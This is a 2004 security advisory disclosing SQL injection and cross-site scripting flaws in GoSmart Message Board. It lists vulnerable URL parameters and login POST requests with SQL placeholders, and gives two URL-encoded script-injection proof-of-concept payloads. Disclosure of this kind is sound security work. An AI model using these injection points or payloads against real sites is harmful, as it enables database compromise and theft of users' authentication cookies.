This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting). Date: 11.10.04 Severity: Low Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx Platform: ASP I. DESCRIPTION -------------- Multiple vulnerabilities were found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. 1. SQL injection (minimal risk, because using Access database) messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1 messageboard/Forum.asp?Username=&Category=[SQL CODE HERE] messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1 messageboard/Forum.asp?Category=[SQL CODE HERE] POST /messageboard/Login_Exec.asp HTTP/1.1 Host: www.gosmart4u.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=[SQL CODE HERE]&Password=1&Login=1 POST /messageboard/Login_Exec.asp HTTP/1.1 Host: www.gosmart4u.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=1&Password=[SQL CODE HERE]&Login=1 2. XSS: /messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript %3Ealert%28%29%3C%2Fscript%3E%3C%22 /messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert% 28%29%3C%2Fscript%3E%3C%22 II. IMPACT ---------- A remote user can access the target user's cookies (including authentication cookies). A remote user can cause SQL commands to be executed by the underlying database. III. SOLUTION ------------- Not available currently. IV. VENDOR FIX/RESPONSE ----------------------- n/a V. CREDIT ------------- Positive Technologies (www.ptsecurity.com) is information security company especially focused on development of MaxPatrol - professional security scanner.